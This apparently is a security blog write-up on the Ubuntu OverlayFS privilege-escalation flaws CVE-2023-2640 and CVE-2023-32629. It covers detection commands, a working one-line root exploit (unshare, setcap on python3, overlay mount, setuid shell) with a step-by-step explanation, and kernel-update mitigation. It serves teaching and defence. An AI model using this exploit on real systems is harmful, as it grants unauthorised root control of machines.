Ubuntu GameOver(lay) Local Privilege Escalation CVE-2023–32629 and CVE-2023–2640

The vulnerabilities CVE-2023–32629 and CVE-2023–2640 were both discovered in the Ubuntu kernel’s OverlayFS module. A simple POC to check if your ubuntu is vulnerable, and how to fix it.

CVE-2023–2640

This vulnerability involves specific Ubuntu kernels that permit an unprivileged user to set privileged extended attributes on mounted files without the proper security checks. Essentially, an unprivileged user could set privileged extended attributes on the mounted files, leading them to be set on the upper files without the appropriate security checks, which could potentially lead to unauthorized access or other unspecified impacts​.

Reference:

https://nvd.nist.gov/vuln/detail/CVE-2023-2640

CVE-2023–32629

This is a local privilege escalation vulnerability that skips permission checks when performing certain operations on Ubuntu kernels. More specifically, the flaw is in the OverlayFS ovl_copy_up_meta_inode_data function where permission checks are skipped when calling ovl_do_setxattr on Ubuntu kernels​.

Reference:

https://www.tenable.com/cve/CVE-2023-32629

https://access.redhat.com/security/cve/CVE-2023-32629

Impact

Both vulnerabilities enable a local privilege escalation, where an unprivileged user can gain elevated privileges on the system. This is a serious issue as it allows attackers with basic access to escalate their privileges to a root level, gaining full control over the affected system.

POC

Payload

To check if the ubuntu support or running overlay.

#Check if the Module is Loaded
lsmod | grep overlay
#Check if the Module is Available
modinfo overlay
#Check the Filesystem Type
mount | grep overlay

Screenshot capture from HTB analytics machine, running 22.04.2 Ubuntu

#Make sure you run this payload with lower privilege user, you may change the /bin/bash to other command.
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'

Privilege Escalation succesful.

Payload Explanation

unshare -rm

• unshare is a command that allows you to run a program in a new namespace. A namespace is a feature of the Linux kernel that partitions kernel resources so that one set of processes sees one set of resources while another set of processes sees another, isolated set of resources.
• The -r option creates a new user namespace and maps the user to root in the new namespace.
• The -m option creates a new mount namespace, meaning that any mounts made won't be seen by processes outside of this namespace.

sh -c “mkdir l u w m && cp /u*/b*/p*3 l/;

• This invokes a new shell sh to execute the command string provided after -c.
• mkdir l u w m creates four directories named l, u, w, and m.
• cp /u*/b*/p*3 l/ this command is copying a Python3 binary (based on the pattern /u*/b*/p*3) to the l directory.

setcap cap_setuid+eip l/python3;

• setcap is used to set capabilities on binaries.
• cap_setuid allows the binary to change its UID (User Identifier).
• +eip ensures that the capability is effective, inheritable, and permitted.
• This command is granting the python3 binary in the l directory the ability to change its user ID, effectively allowing it to become any user, including root.

mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m

• This mounts an overlay filesystem. Overlay filesystems let you overlay one directory (called the upper directory) on top of another (called the lower directory).
• Here, it’s overlaying the directory u over l, using w as a work directory, and mounting the resulting filesystem at m.

touch m/*

• This command is creating a new, empty file for every file that exists in the m directory.

u/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'

• After the sh command sequence completes, this runs a Python3 command from the u directory.
• os.setuid(0)sets the user ID of the current process to 0, which is the UID for root. Given that the Python3 binary has been granted the cap_setuid capability, it can effectively change its UID to root.
• os.system("/bin/bash")starts a new bash shell. Since the process's user ID was just set to root, this bash shell runs with root privileges.

Payload reference:

https://www.reddit.com/r/selfhosted/comments/15ecpck/ubuntu_local_privilege_escalation_cve20232640/ a

https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629/blob/main/exploit.sh

Mitigation

Update ubuntu kernel version.

Reference:

https://ubuntu.com/security/notices/USN-6250-1

https://thesecmaster.com/how-to-fix-gameoverlay-two-local-privilege-escalation-vulnerabilities-in-ubuntu-linux-kernel/#How_to_Test_the_GameOverlay_Vulnerabilities

Reference:

https://www.crowdstrike.com/blog/crowdstrike-discovers-new-container-exploit/

https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability#mitigation--detection-19 (This is pretty good read)

https://nvd.nist.gov/vuln/detail/CVE-2023-2640#match-9430748

https://nvd.nist.gov/vuln/detail/CVE-2023-32629